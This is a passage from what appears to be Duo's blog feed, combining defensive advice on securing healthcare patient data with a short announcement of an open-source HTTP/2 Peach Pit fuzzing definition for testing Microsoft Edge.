One way to protect against known system and software vulnerabilities is to keep your applications up to date, and select a security solution that detects out-of-date and risky devices logging into your systems containing patient data. This can ensure only trustworthy devices can access confidential information.

Old vulnerabilities are often leveraged by malicious hackers seeking to gain unauthorized access to your data and systems. By keeping your software and devices updated, you can ensure you have the latest security patches necessary to prevent successful attacks.

Another essential security control is related to access controls and authentication to systems containing patient data. Implementing two-factor authentication across your organization can ensure only trusted and legitimate users can access applications and patient data by verifying their identity via a second factor.

Strong access controls can help prevent breaches due to threats like phishing, which may have been the root cause of a 2015 data breach at Anthem, the second largest healthcare insurer in the U.S. Stolen employee credentials gave malicious hackers access to their database, affecting 80 million patients.

Learn more about securing access to healthcare data and download Duo’s Guide to Securing Patient Data.

]]>
<![CDATA[HTTP/2 Peach Pit for Microsoft Edge]]> https://duo.com/blog/http2-peach-pit-for-microsoft-edge https://duo.com/blog/http2-peach-pit-for-microsoft-edge Fri, 23 Dec 2016 00:00:00 -0500

Happy Holidays from Duo Labs. A very short blog post to announce the availability of a tool that some of you might find useful. Here at Duo Labs we believe that open sourcing security research tools helps the greater research community push technology forward. Hopefully you find this useful to your own research or testing efforts and we encourage everyone to please consider joining us in sharing your tools which are typically considered proprietary with the public in the spirit of bettering security for everyone.

During the last part of this year we spent a little time over here at Duo Labs looking at Microsoft Edge. Part of that work of course, is performing fuzz testing against various protocols that the browser supports. One such fuzzing tool that we like to use is known as Peach Fuzzer which we, in the case of Microsoft Edge used to test the emerging HTTP/2 protocol.

While we are still deciding how much more we want to look at Microsoft’s Edge, we thought that it might be helpful to release the Peach Pit that Mikhail Davidov created for use with the Enterprise version of Peach Fuzzer.

This peach pit implements the HTTP/2 protocol RFC-7540 and is targetted at Microsoft Edge.

Full documentation and all code is available on Mikhail’s github.

]]>